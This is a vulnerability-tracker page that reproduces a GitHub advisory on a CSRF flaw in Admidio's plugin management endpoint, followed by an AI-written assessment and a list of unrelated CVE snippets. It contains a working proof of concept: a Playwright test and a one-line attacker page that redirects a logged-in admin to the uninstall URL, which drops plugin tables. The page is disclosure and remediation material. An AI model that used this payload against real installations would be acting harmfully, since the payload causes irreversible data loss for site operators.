Admidio CVE-2026-53760
MEDIUMSeverity by source
AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L
PR:H reflects that only an admin-session victim enables impact; UI:R captures required navigation; I:H for irreversible DROP TABLE data loss; A:L for plugin disruption; C:N as no data is disclosed to attacker.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L
Lifecycle Timeline
1DescriptionGitHub Advisory
Summary
The modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include SameSite=Lax session cookies. An attacker crafts a malicious page that, when an authenticated administrator visits it, triggers arbitrary plugin operations. The uninstall operation executes DROP TABLE SQL scripts and destroys plugin data.
Details
modules/plugins.php reads the mode (install, uninstall, update) and name parameters directly from $_GET:
// modules/plugins.php
$mode = admFuncVariableIsValid($_GET, 'mode', 'string');
$pluginName = admFuncVariableIsValid($_GET, 'name', 'string');The file contains zero calls to SecurityUtils::validateCsrfToken(). Other administrative operations in the same codebase (such as the save mode in preferences) validate CSRF tokens correctly.
Because the operations use GET requests, modern browsers send SameSite=Lax cookies on top-level GET navigations (link clicks, redirects, window.location assignments). A cross-origin page triggers these operations by navigating the browser to the vulnerable URL.
The doUninstall() function is the most destructive path. It executes SQL scripts from the plugin's db_scripts/ directory, which contain DROP TABLE statements:
// modules/plugins.php - doUninstall()
function doUninstall($pluginFolder) {
// Reads and executes SQL from $pluginFolder/db_scripts/uninstall.sql
// Contains DROP TABLE statements
}Proof of Concept
The following Playwright test demonstrates a cross-origin CSRF attack. An attacker hosts a page on a different origin that redirects an authenticated administrator's browser to the uninstall endpoint:
// playwright-csrf-poc.js
const { test, expect } = require('@playwright/test');
test('CSRF plugin uninstall via cross-origin redirect', async ({ browser }) => {
const context = await browser.newContext();
const page = await context.newPage();
// Step 1: Admin logs in to Admidio
await page.goto('https://admidio.example.com/adm_program/system/login.php');
await page.fill('#usr_login_name', 'admin');
await page.fill('#usr_password', 'password');
await page.click('#btn_login');
await page.waitForURL('**/overview.php');
// Step 2: Admin visits attacker-controlled page on different origin
// The attacker page contains:
// <script>window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';</script>
await page.goto('https://attacker.example.com/csrf.html');
// Step 3: Browser follows redirect with SameSite=Lax cookies
// The birthday plugin is uninstalled, its database tables dropped
await page.waitForURL('**/plugins.php*');
// Verify the plugin was uninstalled
await page.goto('https://admidio.example.com/adm_program/modules/plugins.php');
const content = await page.content();
expect(content).not.toContain('birthday');
});Simplified attacker page (csrf.html hosted on attacker origin):
<html>
<body>
<script>
window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';
</script>
</body>
</html>When an administrator visits this page, the browser navigates to the Admidio uninstall URL with full session cookies, and the server uninstalls the birthday plugin.
Impact
An unauthenticated attacker tricks an Admidio administrator into visiting a malicious web page (via phishing, forum post, or embedded content) that performs plugin operations without visible indication. The uninstall operation executes DROP TABLE statements, causing irreversible data loss. The install operation activates plugins with known vulnerabilities. The update operation disrupts plugin functionality. The victim only needs to visit a single page.
Recommended Fix
Switch plugin install, uninstall, and update operations from GET to POST requests. Add SecurityUtils::validateCsrfToken() checks to all state-changing operations in modules/plugins.php, consistent with the pattern used elsewhere in the codebase.
--- *Found by aisafe.io*
AnalysisAI
Cross-site request forgery in Admidio's plugin management endpoint (modules/plugins.php) enables a remote attacker to trigger destructive plugin operations - including irreversible DROP TABLE SQL execution - against any authenticated administrator who visits an attacker-controlled web page. The endpoint processes install, uninstall, and update operations via unauthenticated GET requests lacking CSRF token validation, and SameSite=Lax cookie behavior causes browsers to automatically include session credentials on top-level GET navigations from cross-origin pages. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an Admidio administrator to have an active browser session (valid SameSite=Lax session cookie) and to follow a cross-origin top-level GET navigation to the vulnerable URL - for example, by clicking a phishing link, being redirected, or having `window.location` set by attacker-controlled JavaScript on any page they visit. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L scores 5.2, reflecting that a high-privileged victim (admin) and user interaction are required. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a target Admidio installation and sends a phishing email to the administrator, containing a link to an attacker-controlled page hosting a single-line `window.location` redirect to `modules/plugins.php?mode=uninstall&name=<plugin>`. When the admin clicks the link while holding an active Admidio session, the browser follows the top-level GET navigation with full SameSite=Lax session cookies, the server executes `doUninstall()`, and the target plugin's `DROP TABLE` SQL scripts run without any confirmation prompt or visible error. … |
| Remediation | Consult the vendor advisory at https://github.com/Admidio/admidio/security/advisories/GHSA-hm42-q32m-vj4f for the patched release version, as no specific fix version number was confirmed in the available data. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-352 – Cross-Site Request Forgery (CSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-hm42-q32m-vj4f